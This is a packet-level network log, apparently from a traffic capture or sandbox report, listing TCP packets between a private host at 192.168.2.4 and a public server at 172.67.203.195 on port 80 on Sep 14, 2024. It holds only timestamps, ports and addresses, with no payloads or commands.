Sep 14, 2024 18:31:08.555493116 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.555515051 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.555526972 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.555560112 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.555583000 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.555594921 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.555625916 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.555644989 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.555665016 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.555716038 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.555721045 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.555752039 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.555783987 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.555805922 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.555816889 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.555850029 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.555872917 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.555902004 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.555934906 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.555958033 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.555983067 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.556037903 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.556051970 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.556083918 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.556118011 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.556140900 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.556226969 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.556258917 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.556282997 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.556292057 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.556324959 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.556345940 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.556356907 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.556410074 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.556411982 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.556458950 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.556490898 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.556514025 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.556524992 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.556555986 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.556585073 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.556607962 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.556642056 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.556663990 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.556674957 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.556708097 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.556731939 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.556744099 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.556798935 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.556941032 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.556972980 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.557013035 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.557024956 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.557041883 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.557080984 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.557096958 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.557112932 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.557147026 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.557162046 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.557286978 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.557320118 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.557337046 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.557353973 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.557387114 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.557400942 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.557436943 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.557468891 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.557485104 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.557502985 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.557535887 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.557550907 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.557569027 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.557619095 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.557620049 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.557651997 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.557683945 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.557701111 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.557718039 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.557750940 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.557769060 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.557801008 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.557832003 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.557849884 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.557866096 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.557902098 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.557912111 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.557935953 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.557967901 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.557986021 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.558002949 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.558053970 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.596498013 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.596776009 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.596811056 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.596828938 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.596844912 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.596863031 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.596880913 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.597062111 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.628933907 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.638906002 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.638974905 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.639018059 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.639029026 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.639062881 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.639087915 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.639115095 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.639147997 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.639168978 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.639183044 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.639216900 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.639250994 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.639281988 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.639314890 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.639321089 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.639347076 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.639348030 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.639396906 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.639410973 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.639451027 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.639467955 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.639487028 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.639550924 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.639689922 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.639740944 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.639774084 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.639797926 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.639823914 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.639857054 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.639878988 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.639889956 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.639942884 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.639946938 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.639971972 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.640022039 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.640027046 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.640074968 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.640104055 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.640135050 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.640153885 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.640202045 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.640216112 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.640235901 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.640289068 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.640299082 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.640336990 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.640358925 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.640388012 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.640419960 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.640463114 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.640470028 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.640506983 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.640517950 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.640526056 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.640552044 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.640584946 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.640619040 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.640636921 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.640666008 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.640671968 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.640698910 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.640748978 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.640757084 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.640783072 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.640814066 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.640836954 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.640849113 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.640882015 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.640907049 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.640913010 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.640964985 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.640966892 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.641000032 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.641031027 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.641057014 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.641066074 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.641097069 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.641118050 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.641130924 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.641179085 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.641186953 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.641213894 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.641246080 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.641268969 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.641297102 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.641347885 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.641354084 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.641383886 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.641416073 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.641443014 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.641450882 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.641499043 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.641505003 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.641531944 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.641582012 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.641583920 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.641616106 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.641647100 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.641671896 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.641681910 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.641717911 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.641740084 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.641751051 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.641782999 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.641807079 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.641817093 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.641849995 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.641875029 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.641884089 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.641916990 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.641942024 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.641967058 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.641998053 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.642023087 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.642049074 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.642081022 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.642108917 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.642113924 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.642147064 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.642170906 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.642194986 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.642230034 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.642252922 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.642262936 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.642294884 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.642313004 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.642330885 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.642364025 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.642393112 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.642398119 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.642431974 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.642453909 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.642463923 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.642496109 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.642520905 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.642532110 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.642563105 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.642582893 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.642597914 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.642628908 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.642657995 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.642662048 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.642699003 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.642718077 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.642733097 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.642765045 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.642793894 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.642797947 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.642831087 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.642853022 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.642863035 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.642895937 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.642923117 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.642929077 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.642961025 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.642982006 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.642993927 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.643026114 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.643047094 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.643059015 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.643090963 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.643110991 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.643125057 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.643177986 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.649959087 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.683371067 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.683459997 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.683497906 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.683532000 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.683568001 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.683602095 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.683639050 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.683759928 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.683759928 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.683759928 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.725953102 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.726021051 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.726073980 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.726106882 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.726111889 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.726140976 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.726191998 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.726211071 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.726226091 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.726233959 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.726259947 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.726279020 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.726294041 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.726326942 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.726350069 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.726361990 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.726397991 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.726418972 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.726432085 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.726468086 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.726490974 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.726507902 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.726557970 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.726562977 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.726592064 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.726625919 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.726646900 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.726676941 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.726727009 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.726730108 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.726763010 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.726793051 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.726819038 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.726840973 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.726892948 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.726900101 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.726924896 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.726957083 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.726977110 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.727018118 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.727051973 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.727072001 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.727099895 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.727133989 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.727154016 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.727165937 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.727220058 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.727222919 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.727268934 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.727319956 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.727340937 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.727353096 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.727415085 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.727416039 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.727475882 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.727526903 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.727531910 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.727560043 CEST	80	49738	172.67.203.195	192.168.2.4
